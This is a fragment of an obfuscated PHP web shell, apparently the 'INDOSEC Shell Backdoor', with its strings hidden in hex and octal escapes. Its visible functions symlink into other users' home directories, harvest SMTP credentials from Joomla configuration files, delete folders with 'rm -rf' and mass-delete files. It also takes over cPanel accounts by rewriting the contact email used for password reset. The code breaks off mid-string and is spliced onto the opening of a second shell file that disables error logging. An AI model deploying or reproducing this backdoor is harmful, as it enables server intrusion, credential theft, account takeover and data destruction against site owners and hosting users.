"\x3c\57\164\x64\76\xa\x9\x9\x9\11\11\11\11\74\164\144\76" . $matches . "\x3c\x2f\164\144\76\12\x9\x9\x9\11\x9\11\11\74\164\144\76\74\141\40\x68\x72\x65\146\75{$full}\x2f\151\156\x64\x73\x63\x5f\x73\x79\x6d\x2f\162\157\157\164\57\x68\157\155\x65\x2f" . $matches . "\x2f\160\165\x62\x6c\x69\143\137\150\164\155\154\x20\x74\141\x72\147\145\164\x3d\47\x5f\x62\154\141\156\x6b\x27\x3e\x53\171\155\154\151\x6e\153\74\x2f\x61\76\x3c\57\x74\144\76\xa\x9\11\11\11\x9\x9\74\x2f\164\x72\76"; $dcount++; } fclose($file); echo "\x3c\57\x74\x61\x62\154\x65\x3e\74\57\x64\151\166\76"; unlink("\164\145\x73\x74\56\x74\x78\164"); } } } die; } goto QpB05; PDFOO: if ($_GET["\x61\153\x73\151"] == "\x73\x6d\x74\160\147\162\141\x62") { function scj($path) { $paths = scandir($path); foreach ($paths as $pathb) { if (!is_file("{$path}\x2f{$pathb}")) { continue; } $ambil = file_get_contents("{$path}\x2f{$pathb}"); $ambil = str_replace("\x24", '', $ambil); if (preg_match("\57\x4a\103\157\156\146\151\147\x7c\152\x6f\157\x6d\x6c\141\57", $ambil)) { $smtp_host = ambilkata($ambil, "\x73\x6d\x74\160\150\157\163\x74\x20\x3d\40\47", "\47"); $smtp_auth = ambilkata($ambil, "\x73\x6d\x74\x70\141\165\164\150\x20\75\x20\47", "\47"); $smtp_user = ambilkata($ambil, "\x73\155\164\160\x75\x73\145\162\40\x3d\x20\47", "\x27"); $smtp_pass = ambilkata($ambil, "\x73\155\164\x70\x70\141\x73\x73\x20\x3d\x20\x27", "\47"); $smtp_port = ambilkata($ambil, "\163\155\x74\160\160\x6f\162\x74\40\75\x20\47", "\47"); $smtp_secure = ambilkata($ambil, "\x73\155\164\x70\x73\x65\143\x75\x72\145\40\x3d\x20\x27", "\x27"); echo "\74\164\x61\142\x6c\145\x20\x63\x6c\141\163\x73\75\x27\x74\x65\x78\x74\55\x77\150\151\164\145\40\x74\x61\142\x6c\145\40\x74\141\x62\154\145\x2d\x62\x6f\162\144\x65\x72\145\144\x27\x3e\12\x9\x9\11\x9\11\11\x3c\x74\x72\x3e\xa\11\x9\x9\11\x9\x9\x9\x3c\164\144\x3e\123\115\124\x50\x20\110\157\x73\164\72\x20{$smtp_host}\74\x2f\164\x64\x3e\xa\11\x9\11\x9\x9\x9\x3c\57\164\x72\x3e\xa\x9\11\11\11\11\x9\74\164\x72\x3e\xa\11\11\11\x9\11\x9\x9\74\x74\x64\76\x53\115\x54\x50\x20\120\x6f\162\164\72\40{$smtp_port}\74\57\x74\144\x3e\12\x9\11\11\11\x9\x9\x3c\x2f\164\162\76\12\x9\x9\x9\11\x9\11\x3c\x74\162\x3e\xa\11\x9\11\11\x9\x9\x9\74\164\144\x3e\123\115\124\120\40\x55\x73\x65\x72\x3a\40{$smtp_user}\x3c\x2f\x74\144\76\12\11\11\x9\11\11\11\74\x2f\164\x72\76\xa\11\x9\x9\x9\x9\x9\74\164\162\76\xa\x9\11\11\x9\11\11\11\74\164\144\76\x53\115\124\120\40\120\141\x73\x73\72\x20{$smtp_pass}\x3c\x2f\x74\144\x3e\12\x9\x9\11\x9\11\x9\74\x2f\164\x72\x3e\xa\11\x9\x9\11\11\x9\74\164\x72\76\12\x9\x9\x9\11\x9\x9\11\x3c\x74\x64\x3e\123\x4d\x54\x50\40\101\x75\x74\150\x3a\40{$smtp_auth}\x3c\57\x74\144\76\12\11\11\11\11\x9\x9\x3c\57\164\x72\76\xa\x9\11\11\x9\x9\x9\x3c\x74\162\x3e\12\11\11\11\11\11\x9\x9\74\164\144\76\x53\115\x54\x50\40\123\145\143\x75\162\x65\72\x20{$smtp_secure}\x3c\x2f\164\x64\x3e\12\x9\x9\11\x9\11\x9\74\57\x74\x72\x3e\12\x9\x9\11\x9\x9\74\x2f\x74\141\x62\154\x65\x3e"; } } } echo "\x3c\160\x20\143\x6c\141\x73\163\75\47\x74\145\170\164\x2d\155\x75\164\145\144\x27\76\x4e\x42\40\x3a\x20\124\x6f\x6f\154\163\x20\151\156\x69\x20\x77\157\162\153\40\x6a\151\153\141\40\x64\x69\x6a\x61\x6c\141\156\153\x61\x6e\40\144\x69\x20\x64\x61\x6c\141\x6d\40\146\x6f\154\144\x65\162\x20\74\165\x3e\143\157\156\146\151\147\74\57\x75\76\x20\x28\x20\145\x78\72\40\57\x68\157\x6d\x65\x2f\165\x73\145\x72\57\160\165\x62\x6c\x69\143\137\x68\x74\x6d\154\x2f\x6e\x61\x6d\x61\146\157\x6c\x64\x65\162\137\143\157\x6e\146\x69\x67\x20\51\74\x2f\160\x3e"; $smtp = scj($path); die; } goto OKr2f; vGSQa: $free = disk_free_space($path); goto Dq2KF; WRL5A: $sof = $_SERVER["\x53\105\122\x56\105\122\137\123\117\106\x54\127\101\122\105"]; goto VHfhx; TncqD: if ($_GET["\141\153\163\x69"] == "\x72\x65\x6e\x61\155\x65\x5f\x66\157\154\144\x65\162") { $nama = basename(getcwd()); $output = "\xa\x9\x9\x9\133\40\x3c\x61\x20\x68\x72\145\146\75\47\x3f\144\x69\x72\75" . $dir . "\x26\141\x6b\x73\151\x3d\162\x65\x6e\141\155\x65\137\x66\157\154\x64\145\x72\47\x3e\x52\145\x6e\x61\x6d\145\x3c\57\141\76\40\135\40\40\133\40\74\141\40\x68\162\145\146\x3d\47\x3f\x64\151\x72\x3d" . $dir . "\x26\x61\153\x73\x69\75\150\141\x70\165\163\x5f\x66\x6f\x6c\x64\145\162\x27\x3e\x44\145\154\x65\164\145\x3c\x2f\x61\76\x20\x5d\x20\xa\x9\x9\11\x3c\150\64\76\x3c\151\155\x67\x20\163\x72\143\x3d\47\x68\x74\x74\160\72\x2f\57\x61\165\x78\x2e\x69\x63\157\156\163\160\141\154\x61\x63\145\x2e\x63\157\x6d\57\165\x70\154\x6f\141\144\163\x2f\x66\157\x6c\x64\x65\162\55\x69\143\x6f\156\x2d\62\65\x36\55\61\x37\70\67\66\67\x32\x34\70\x32\56\x70\x6e\147\47\40\x63\x6c\141\x73\163\x3d\47\x69\x63\x6f\47\x3e\x3c\57\x69\x6d\147\x3e\x20\x52\x65\x6e\x61\x6d\x65\40\106\157\x6c\x64\x65\162\40\x3a\40{$nama}\40\74\57\x68\x34\x3e\xa\11\x9\11\74\146\157\x72\155\x20\x6d\145\164\x68\x6f\144\75\47\120\117\123\x54\x27\x3e\12\11\x9\11\x9\x3c\151\x6e\160\165\x74\40\164\x79\160\145\75\47\x74\x65\170\164\x27\40\143\154\x61\x73\163\x3d\47\146\157\x72\155\x2d\143\157\156\x74\162\157\x6c\x27\40\x6e\141\155\x65\75\x27\x6e\x61\x6d\141\x6e\x65\167\47\40\141\165\x74\157\143\157\155\x70\x6c\x65\164\x65\x3d\x27\x6f\x66\x66\47\40\160\154\141\x63\x65\x68\x6f\x6c\144\145\x72\75\47\x4d\141\163\x75\153\x61\x6e\40\116\x61\x6d\x61\x20\x42\x61\x72\x75\56\x2e\56\x27\76\74\142\x72\x2f\76\xa\x9\x9\11\11\74\142\165\164\164\157\x6e\x20\x74\171\x70\145\x3d\47\163\x75\x6d\142\x69\x74\x27\x20\x63\154\x61\163\x73\x3d\47\x62\x74\x6e\x20\x62\x74\x6e\x2d\x69\x6e\146\x6f\40\142\164\156\55\142\154\157\143\153\47\40\x6e\141\155\145\x3d\x27\x67\x61\156\164\x69\47\x3e\x47\x61\x6e\x74\x69\x21\x21\x3c\57\142\165\x74\164\x6f\156\x3e\74\x62\162\x2f\x3e\xa\11\11\x9\74\x2f\x66\157\x72\155\x3e"; echo $output; if (isset($_POST["\x67\x61\x6e\164\x69"])) { $lama = $dir; $baru = $_POST["\x6e\x61\x6d\141\156\x65\167"]; $ubah = rename($lama, $baru); if ($ubah) { echo "\74\x73\x63\x72\151\160\x74\x3e\167\x69\x6e\x64\x6f\x77\56\154\157\143\141\164\151\x6f\x6e\75\47\x3f\x64\151\x72\75" . dirname($dir) . "\x27\x3b\x20\141\154\145\162\x74\x28\47\x42\145\162\x68\x61\x73\x69\x6c\x20\x4d\x65\x6e\147\147\x61\x6e\x74\151\x20\116\x61\155\x61\x27\x29\73\x3c\x2f\163\x63\162\x69\160\164\76"; } else { echo "\74\163\143\x72\151\160\x74\76\141\x6c\x65\x72\x74\50\47\x47\x61\x67\x61\154\40\115\x65\156\147\x67\x61\156\x74\151\40\116\x61\x6d\x61\x27\51\73\x3c\x2f\163\143\x72\x69\160\164\76"; } } die; } goto svX8T; yBPPy: if ($_GET["\141\153\x73\x69"] == "\162\x65\x6e\141\155\145") { $nama = basename($file); echo "\x5b\x20\74\141\x20\150\162\x65\x66\75\x22\77\144\151\x72\75" . $dir . "\46\x61\x6b\x73\151\x3d\166\151\145\x77\46\x66\x69\x6c\x65\x3d" . $file . "\x22\x3e\x4c\x69\150\141\x74\x3c\57\141\76\40\x5d\40\40\133\x20\x3c\x61\40\x68\x72\x65\x66\x3d\x22\x3f\144\x69\x72\x3d" . $dir . "\x26\x61\x6b\163\x69\x3d\x65\144\151\164\46\x66\151\154\x65\x3d" . $file . "\x22\76\x45\144\151\x74\x3c\57\141\x3e\40\x5d\40\x20\x5b\40\x3c\141\40\143\x6c\x61\163\x73\75\42\x61\143\x74\x69\x76\x65\x22\x20\x68\x72\x65\x66\x3d\x22\x3f\x64\151\x72\x3d" . $dir . "\x26\141\153\163\151\x3d\x72\x65\x6e\141\x6d\145\x26\146\x69\x6c\x65\x3d" . $file . "\x22\x3e\122\145\156\141\x6d\145\74\x2f\x61\76\40\135\40\40\133\40\x3c\141\x20\150\162\x65\146\x3d\42\x3f\x64\x69\162\75" . $dir . "\x26\141\x6b\163\151\x3d\x68\x61\160\165\x73\x66\x26\x66\x69\154\x65\x3d" . $file . "\42\76\x44\145\x6c\145\164\145\x3c\x2f\141\76\x20\135"; echo "\74\x66\157\162\155\x20\155\145\x74\150\157\x64\75\47\x50\117\123\x54\47\x3e\12\x9\11\11\x9\74\150\65\76\74\x69\x20\143\154\x61\x73\x73\x3d\x27\x66\141\40\x66\141\55\x66\x69\154\145\x27\x3e\x3c\57\x69\x3e\40\x52\145\156\141\155\145\x20\106\151\x6c\145\x20\x3a\x20{$nama}\x3c\x2f\x68\x35\x3e\xa\11\x9\x9\x9\74\x69\x6e\x70\x75\x74\40\x74\171\x70\145\x3d\47\164\145\x78\x74\47\40\143\x6c\141\163\163\75\x27\x66\157\x72\155\x2d\x63\x6f\x6e\x74\162\157\154\47\40\156\x61\155\x65\x3d\47\156\141\x6d\141\156\x65\x77\47\40\141\x75\x74\x6f\x63\157\155\160\x6c\145\164\145\75\47\157\146\x66\47\x20\x70\x6c\141\143\x65\150\x6f\x6c\x64\x65\162\x3d\x27\x4d\x61\163\165\153\141\x6e\x20\x4e\141\155\x61\x20\102\x61\162\x75\x2e\56\x2e\x27\x3e\74\142\162\x2f\76\xa\x9\x9\x9\11\x3c\142\165\164\x74\157\156\x20\164\x79\x70\x65\x3d\47\x73\165\155\x62\151\164\47\x20\143\x6c\141\x73\x73\75\47\142\x74\x6e\40\142\x74\156\x2d\x69\156\146\157\40\x62\164\x6e\x2d\x62\x6c\x6f\143\x6b\x27\x20\156\141\x6d\x65\x3d\47\x72\x65\156\141\155\x65\x5f\146\x69\154\x65\x27\x3e\x55\160\144\x61\164\145\74\57\142\x75\164\x74\x6f\x6e\x3e\12\x9\x9\x9\x3c\57\146\157\x72\155\x3e"; if (isset($_POST["\162\x65\x6e\141\x6d\x65\x5f\x66\151\x6c\145"])) { $lama = $file; $baru = $_POST["\x6e\141\155\141\x6e\x65\167"]; rename($baru, $lama); if (file_exists($baru)) { echo "\x3c\163\x63\162\151\160\x74\x3e\141\x6c\145\162\164\x28\42\116\141\155\141\x20" . $baru . "\40\124\145\x6c\x61\150\40\x44\151\147\165\x6e\x61\x6b\x61\x6e\42\51\x3b\x3c\57\x73\x63\x72\151\x70\x74\x3e"; } else { if (rename($lama, $baru)) { echo "\74\x73\143\162\151\160\164\x3e\x77\151\156\x64\x6f\167\x2e\154\x6f\143\x61\x74\x69\x6f\x6e\x3d\42\x3f\144\x69\x72\x3d" . $dir . "\x22\73\x20\141\x6c\145\162\164\x28\x22\123\165\x6b\163\x65\163\x20\x4d\x65\156\x67\x67\141\x6e\164\151\40\x4e\x61\x6d\141\40\x4d\x65\156\x6a\141\144\x69\40" . $baru . "\x22\x29\73\x3c\57\163\x63\x72\x69\x70\x74\x3e"; } else { echo "\74\x73\x63\x72\151\160\164\x3e\x61\x6c\145\x72\164\x28\42\x47\141\147\x61\154\x20\x4d\x65\x6e\x67\147\x61\156\164\151\40\116\x61\155\x61\42\x29\73\x3c\x2f\163\143\x72\x69\160\164\x3e"; } } } } goto XV3ue; fJEHo: if ($_GET["\141\x6b\163\151"] == "\150\x61\160\x75\x73\x5f\x66\x6f\x6c\x64\145\162") { $nama = basename(getcwd()); $output = "\xa\x9\x9\x9\133\40\74\141\40\x68\x72\145\x66\75\47\x3f\x64\x69\x72\75" . $dir . "\46\141\x6b\x73\151\x3d\162\x65\x6e\141\155\145\137\x66\157\x6c\144\x65\162\x27\x3e\x52\x65\156\141\x6d\145\x3c\x2f\x61\x3e\40\135\x20\x20\x5b\40\x3c\141\x20\x68\x72\x65\146\x3d\x27\x3f\x64\x69\x72\x3d" . $dir . "\46\141\153\163\151\x3d\x68\141\x70\x75\163\137\146\157\x6c\144\x65\x72\47\x3e\104\145\x6c\145\x74\x65\74\57\141\76\40\x5d\x20\xa\11\11\11\x3c\144\x69\166\x20\143\x6c\x61\163\163\x3d\47\143\141\162\144\40\143\141\x72\x64\55\x62\157\144\x79\x20\164\145\x78\x74\55\143\145\156\x74\x65\162\x27\x3e\xa\x9\x9\11\x9\74\146\x6f\156\x74\x20\143\157\154\157\162\x3d\x27\x62\x6c\141\143\x6b\47\76\x41\x70\141\x6b\x61\x68\x20\131\141\x6b\151\x6e\x20\x4d\145\x6e\147\150\141\x70\165\x73\40\x3a\x20{$nama}\40\77\74\x2f\146\x6f\x6e\164\x3e\xa\x9\x9\11\x9\x3c\146\x6f\x72\155\x20\155\x65\x74\150\x6f\x64\x3d\x27\x50\117\123\124\x27\76\xa\11\11\11\11\x9\74\141\40\x63\x6c\141\x73\x73\x3d\x27\142\164\156\x20\142\x74\156\x2d\x64\141\156\147\x65\162\x20\142\x74\x6e\x2d\x62\x6c\157\x63\153\x27\x20\150\x72\x65\146\x3d\x27\x3f\x64\x69\162\75" . dirname($dir) . "\x27\76\124\x69\x64\x61\153\74\x2f\141\x3e\12\11\x9\11\x9\x9\x3c\x69\x6e\x70\x75\x74\40\x74\171\x70\145\75\47\163\165\x62\155\x69\x74\47\40\156\x61\155\x65\75\47\x79\141\47\x20\143\154\141\163\x73\x3d\47\142\164\156\x20\x62\164\x6e\x2d\x73\x75\x63\x63\145\163\163\40\142\164\x6e\x2d\142\154\x6f\x63\153\x27\x20\166\x61\x6c\x75\x65\75\47\x59\141\47\x3e\xa\x9\11\11\11\x3c\57\146\x6f\x72\x6d\x3e\xa\x9\11\x9\74\x2f\144\x69\166\x3e\x3c\x62\x72\57\76"; echo $output; if ($_POST["\x79\141"]) { if (is_dir($dir)) { if (is_writable($dir)) { @rmdir($dir); @exe("\x72\x6d\40\55\x72\x66\40{$dir}"); @exe("\162\x6d\144\151\162\x20\57\163\x20\x2f\161\40{$dir}"); echo "\x3c\163\x63\x72\x69\x70\x74\76\x77\x69\156\144\x6f\167\x2e\x6c\157\x63\141\164\x69\157\156\75\x27\77\x64\x69\162\x3d" . dirname($dir) . "\x27\x3b\x20\141\154\x65\x72\x74\50\47\102\145\162\x68\x61\163\151\x6c\40\x4d\145\156\147\150\x61\x70\165\x73\40" . $nama . "\47\51\x3b\74\57\163\143\x72\x69\x70\x74\76"; } else { echo "\x3c\x73\143\162\151\x70\x74\x3e\x77\x69\156\x64\157\x77\x2e\x6c\157\x63\141\164\151\157\x6e\75\x27\x3f\144\x69\162\75" . dirname($dir) . "\x27\x3b\x20\141\154\145\x72\x74\50\x27\124\x69\144\x61\x6b\x20\104\x61\x70\x61\x74\40\115\145\156\147\150\141\x70\165\163\40" . $nama . "\x27\x29\73\x3c\57\x73\143\162\151\160\164\76"; } } } die; } goto TncqD; DE8WR: echo "\x3c\x64\151\x76\x20\x69\x64\x3d\x22\x74\x61\x62\42\76\x3c\x74\141\x62\154\x65\x20\143\x6c\x61\x73\x73\x3d\x22\x74\145\x78\x74\55\167\x68\x69\x74\145\40\x6d\164\55\61\x20\x74\x61\x62\x6c\145\55\150\157\x76\x65\162\40\164\x61\142\x6c\145\x2d\162\145\163\160\157\156\163\151\166\145\42\x3e\xa\11\x9\11\74\x74\150\145\x61\144\40\143\x6c\x61\x73\163\x3d\x22\x62\147\x2d\151\156\146\157\x20\x74\145\170\164\55\143\145\x6e\164\x65\162\42\76\xa\x9\11\x9\11\74\x74\150\40\143\x6c\x61\x73\x73\x3d\42\x74\x65\x78\x74\55\x6c\145\x66\164\x22\76\x46\151\x6c\x65\57\106\157\x6c\x64\145\162\74\57\x74\x68\76\12\11\x9\x9\11\x3c\x74\x68\76\x53\151\172\145\74\x2f\x74\x68\76\xa\11\x9\11\x9\74\x74\x68\76\120\x65\x72\155\151\x73\163\151\157\156\x3c\57\x74\x68\x3e\12\11\11\11\x9\x3c\164\150\x3e\101\x63\x74\151\157\x6e\x3c\x2f\164\150\x3e\xa\11\11\11\x3c\57\164\150\x65\141\x64\x3e"; goto xn6PP; kOh3B: if ($_GET["\141\x6b\x73\151"] == "\162\145\163\x65\164\160\141\x73\163\x63\x70") { echo "\74\x68\x35\40\143\154\x61\163\163\75\42\x74\145\170\x74\55\143\x65\x6e\x74\145\x72\42\76\74\151\40\x63\154\141\163\163\75\42\146\141\40\x66\141\55\x6b\145\171\42\76\x3c\x2f\x69\x3e\40\x41\x75\164\x6f\40\x52\x65\163\145\164\40\x50\x61\163\163\x77\157\x72\x64\x20\x43\x70\x61\x6e\145\x6c\x3c\57\150\x35\76\xa\x9\11\74\146\157\x72\155\x20\155\x65\164\150\157\144\x3d\42\x50\x4f\123\x54\x22\x3e\12\x9\11\11\x3c\x64\x69\166\x20\x63\x6c\x61\163\163\75\x22\146\x6f\162\x6d\55\147\162\x6f\165\x70\42\76\xa\x9\x9\11\x9\x3c\x69\x6e\160\165\x74\40\x74\x79\x70\145\75\x22\145\x6d\141\x69\154\x22\40\156\x61\x6d\145\x3d\x22\145\155\x61\x69\154\x22\40\x63\154\141\x73\x73\x3d\42\x66\x6f\x72\x6d\55\143\157\156\164\x72\x6f\154\42\x20\x70\x6c\141\x63\x65\x68\157\x6c\144\x65\162\75\x22\115\x61\163\165\153\x61\156\40\x45\155\x61\x69\x6c\x2e\x2e\x2e\x22\57\x3e\x3c\x62\162\57\x3e\12\11\11\11\x9\x3c\151\x6e\x70\x75\x74\x20\x74\x79\x70\145\x3d\x22\x73\165\x62\155\151\164\42\40\x6e\x61\155\145\x3d\x22\x73\x75\142\x6d\151\164\x22\40\x63\154\x61\x73\163\75\42\142\x74\x6e\40\x62\164\156\55\x64\x61\156\147\x65\x72\40\142\164\156\x2d\142\154\157\143\x6b\x22\40\x76\141\x6c\x75\x65\x3d\42\x53\x65\156\144\x22\x2f\76\xa\11\x9\x9\74\57\144\x69\x76\76\xa\11\x9\74\57\x66\x6f\x72\155\x3e"; if (isset($_POST["\163\x75\x62\155\x69\x74"])) { $user = get_current_user(); $site = $_SERVER["\x48\x54\x54\120\x5f\110\x4f\123\124"]; $ips = getenv("\122\105\115\x4f\124\105\x5f\x41\x44\104\x52"); $email = $_POST["\145\155\x61\151\154"]; $wr = "\145\155\x61\151\154\x3a" . $email; $f = fopen("\57\150\157\x6d\x65\x2f" . $user . "\x2f\x2e\x63\x70\x61\x6e\145\x6c\57\143\157\156\164\x61\x63\x74\x69\x6e\146\157", "\167"); fwrite($f, $wr); fclose($f); $f = fopen("\x2f\x68\x6f\155\x65\57" . $user . "\57\x2e\x63\157\x6e\x74\x61\143\x74\x69\x6e\146\x6f", "\167"); fwrite($f, $wr); fclose($f); $parm = $site . "\x3a\62\x30\70\x32\57\x72\145\163\x65\x74\160\x61\163\x73\77\x73\164\x61\x72\164\75\61"; echo "\74\142\x72\57\x3e\125\162\x6c\x3a\x20" . $parm . ''; echo "\x3c\x62\162\57\x3e\x55\163\145\x72\x6e\141\x6d\145\72\x20" . $user . ''; echo "\74\x62\x72\x2f\76\123\165\x63\143\x65\x73\x73\x20\x52\145\x73\x65\164\40\x54\157\72\40" . $email . "\74\142\162\x2f\x3e\x3c\142\162\57\x3e"; } die; } goto VpdbN; VHfhx: $dir = str_replace("\x5c", "\x2f", $dir); goto xEaUB; svX8T: if ($_GET["\141\x6b\163\x69"] == "\x6d\141\x73\144\145\154") { function hapus_massal($dir, $namafile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}\x2f{$dirb}"; $lokasi = $dirc . "\57" . $namafile; if ($dirb === "\56") { if (file_exists("{$dir}\57{$namafile}")) { unlink("{$dir}\57{$namafile}"); } } elseif ($dirb === "\56\x2e") { if (file_exists('' . dirname($dir) . "\57{$namafile}")) { unlink('' . dirname($dir) . "\57{$namafile}"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if ($lokasi) { echo "{$lokasi}\40\x3e\x20\x54\x65\162\x68\141\x70\165\163\xa"; unlink($lokasi); $massdel = hapus_massal($dirc, $namafile); } } } } } } } if ($_POST["\x73\164\x61\x72\164"]) { echo "\x5b\x20\x3c\141\x20\x68\x72\x65\x66\x3d\x27\x3f\x64\x69\162\x3d{$dir}\47\76\113\x65\x6d\142\x61\154\151\x3c\x2f\141\76\x20\x5d\12\11\11\11\11\x3c\x74\145\x78\x74\x61\162\145\141\40\143\x6c\141\163\163\x3d\x27\146\x6f\x72\x6d\55\x63\x6f\x6e\164\x72\x6f\154\47\40\x72\157\x77\163\75\x27\67\x27\x20\x64\x69\163\141\x62\x6c\145\144\x3d\47\47\76"; hapus_massal($_POST["\144\137\x64\151\162"], $_POST["\x64\137\x66\151\x6c\x65"]); echo "\74\57\164\145\170\164\141\x72\145\141\x3e\x3c\x62\162\x2f\x3e"; } else { echo "\74\146\157\162\x6d\x20\155\x65\x74\x68\157\144\x3d\x27\x70\x6f\163\164\x27\x3e\xa\x9\x9\x9\x9\x9\x3c\150\x35\76\x3c\151\x20\x63\x6c\x61\x73\x73\75\x27\x66\141\x20\x66\141\x2d\x66\157\154\144\x65\x72\47\76\74\x2f\151\76\40\x4c\x6f\153\141\x73\151\x20\72\74\x2f\x68\65\x3e\xa\x9\11\x9\11\x9\74\x69\156\160\165\x74\x20\x74\x79\160\145\x3d\47\x74\145\170\164\x27\x20\156\x61\x6d\145\x3d\x27\144\x5f\144\151\162\x27\40\166\141\x6c\165\145\75\47{$dir}\x27\x20\x63\154\141\163\163\75\x27\x66\x6f\162\x6d\55\x63\x6f\x6e\164\162\157\154\47\76\74\142\x72\x3e\xa\11\11\11\11\11\x3c\150\x35\x3e\x3c\x69\x20\x63\154\x61\163\x73\40\x3d\x27\x66\141\x20\146\x61\x2d\146\x69\154\145\x27\x3e\x3c\57\x69\x3e\40\116\x61\155\x61\40\x46\x69\154\x65\x20\72\x3c\57\150\65\x3e\12\x9\x9\11\11\11\74\151\156\160\x75\x74\40\164\171\x70\x65\x3d\x27\x74\x65\x78\164\x27\x20\156\141\155\145\x3d\47\x64\x5f\x66\x69\154\145\47\40\x61\x75\x74\x6f\x63\157\x6d\x70\154\x65\x74\145\x3d\x27\157\146\146\x27\x20\160\x6c\141\143\145\150\x6f\154\x64\x65\x72\75\47\x5b\105\170\135\x20\151\156\x64\145\x78\x2e\160\150\160\47\40\x63\154\x61\163\x73\x3d\47\x66\x6f\162\155\x2d\x63\157\156\164\x72\157\154\x27\76\74\x62\x72\76\xa\11\x9\x9\x9\x9\x3c\151\x6e\160\165\164\40\164\171\160\x65\x3d\47\163\x75\142\x6d\x69\164\47\40\156\x61\x6d\x65\x3d\47\163\x74\141\162\x74\x27\40\166\x61\x6c\165\x65\75\47\104\145\x6c\x65\164\145\41\x21\x27\x20\143\154\x61\163\163\75\x27\x62\x74\x6e\40\142\164\x6e\x2d\144\141\x6e\147\x65\x72\40\x66\157\162\x6d\x2d\143\157\156\x74\x72\x6f\154\47\76\12\x9\x9\x9\74\57\x66\x6f\x72\x6d\x3e"; } die; } goto Ednnu; zsyBf: echo "\xa\x9\x9\74\x64\x69\166\x20\x63\x6c\141\163\x73\75\42\143\157\156\164\141\x69\156\x65\x72\42\x3e\xa\x9\x9\x9\74\150\61\x20\143\x6c\141\163\x73\75\42\x74\145\170\x74\55\x63\x65\x6e\164\145\x72\x22\x3e\74\141\40\x68\x72\145\x66\x3d\42\x68\x74\164\160\163\x3a\57\x2f\146\141\143\x65\x62\x6f\157\x6b\56\x63\157\155\57\111\x6e\x64\157\123\x65\x63\117\146\x66\151\x63\x69\141\154\42\40\163\x74\x79\154\145\x3d\x22\x63\157\x6c\x6f\x72\x3a\x23\x66\x66\x66\146\x66\146\x3b\x22\x3e\x7b\x20\111\116\x44\117\x53\105\x43\40\x7d\x3c\57\x68\x31\76\xa\11\x9\x9\x3c\x63\145\x6e\x74\145\162\x3e\74\150\65\76\123\x68\145\x6c\154\40\x42\141\143\153\144\157\157\162\74\57\141\76\74\57\x68\x35\76\74\57\x63\145\x6e\x74\x65\x72\x3e\12\x9\11\x9\74\x68\x72\x2f\76\xa\x9\x9\11\74\144\x69\166\40\143\x6c\x61\163\163\x3d\x22\x74\x65\x78\164\x2d\x63\x65\156\164\x65\162\42\76\xa\11\11\11\11\74\x64\x69\166\x20\x63\x6c\141\x73\163\x3d\x22\x64\x2d\146\154\x65\170\x20\x6a\165\x73\x74\151\146\x79\x2d\143\157\156\164\x65\156\164\55\x63\x65\x6e\164\145\162\x20\x66\x6c\x65\x78\x2d\x77\162\x61\x70\42\76\xa\11\11\11\x9\11\x3c\141\40\150\162\x65\146\75\42\x3f\x22\x20\143\x6c\x61\163\x73\x3d\42\x66\x69\164\165\x72\145\40\142\x74\156\40\x62\x74\x6e\x2d\x64\x61\156\147\145\162\40\142\x74\156\55\163\155\42\76\74\x69\x20\x63\x6c\141\163\163\x3d\x22\x66\141\x20\146\x61\x2d\150\x6f\x6d\145\42\x3e\x3c\57\x69\76\40\x48\x6f\x6d\145\74\57\141\76\12\11\11\11\x9\11\x3c\141\40\150\162\x65\x66\x3d\x22\x3f\x64\151\x72\75" . $dir . "\x26\141\153\163\x69\75\165\160\154\x6f\141\144\42\40\x63\154\141\x73\163\75\x22\146\151\x74\x75\x72\145\x20\x62\x74\156\40\142\164\x6e\55\x64\141\156\147\x65\x72\40\142\164\x6e\55\x73\155\42\76\x3c\151\40\x63\154\x61\x73\x73\75\x22\x66\x61\x20\x66\x61\x2d\x75\x70\x6c\x6f\x61\144\x22\x3e\x3c\57\x69\76\40\x55\160\154\157\141\144\74\x2f\141\x3e\xa\11\x9\x9\x9\11\74\141\40\150\x72\x65\146\x3d\42\x3f\144\x69\162\75" . $dir . "\46\x61\153\163\151\x3d\x62\x75\x61\x74\137\x66\151\154\145\42\40\x63\154\141\163\x73\75\x22\x66\x69\164\x75\162\145\40\x62\x74\156\40\142\x74\x6e\x2d\144\x61\156\147\145\162\40\x62\x74\x6e\x2d\163\x6d\42\x3e\x3c\151\40\x63\154\141\x73\x73\x3d\42\146\x61\40\146\141\55\x70\154\165\x73\55\x63\x69\x72\x63\x6c\145\42\76\74\57\151\76\40\102\x75\x61\x74\40\x46\151\154\145\x3c\x2f\141\x3e\xa\x9\x9\x9\x9\11\74\141\40\x68\162\145\x66\75\x22\77\144\151\x72\x3d" . $dir . "\46\x61\x6b\163\151\75\x62\165\141\164\x5f\x66\157\x6c\144\x65\162\x22\x20\143\x6c\141\163\163\75\42\x66\151\164\165\162\145\40\142\x74\x6e\40\x62\164\156\x2d\x64\141\156\x67\145\x72\x20\142\x74\156\x2d\163\155\42\x3e\74\151\x20\x63\x6c\141\x73\163\x3d\x22\x66\141\x20\146\141\x2d\x70\154\165\x73\42\76\x3c\x2f\151\x3e\x20\102\165\141\x74\x20\106\x6f\154\144\x65\162\x3c\57\141\76\12\x9\x9\x9\11\11\x3c\141\x20\x68\x72\x65\146\75\42\77\x64\151\x72\75" . $dir . "\46\141\153\163\x69\x3d\x6d\141\163\144\145\146\x22\40\143\154\141\163\163\75\x22\x66\151\x74\x75\x72\x65\40\142\164\x6e\40\x62\164\x6e\x2d\x64\x61\x6e\147\x65\162\x20\x62\x74\156\55\163\155\x22\76\74\151\40\x63\154\x61\x73\x73\x3d\x22\x66\141\40\146\x61\x2d\x65\170\x63\154\141<?php
session_start();
error_reporting(0);
set_time_limit(0);
@clearstatcache();
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@ini_set("output_buffering", 0);
@ini_set("display_errors", 0);
$aupas = "453f58de9b549b8aaa53db7c49c8c3c8";
$default_action = "FilesMan";
$default_use_ajax = true;
$default_charset = "UTF-8";
function login_shell()
{
?>
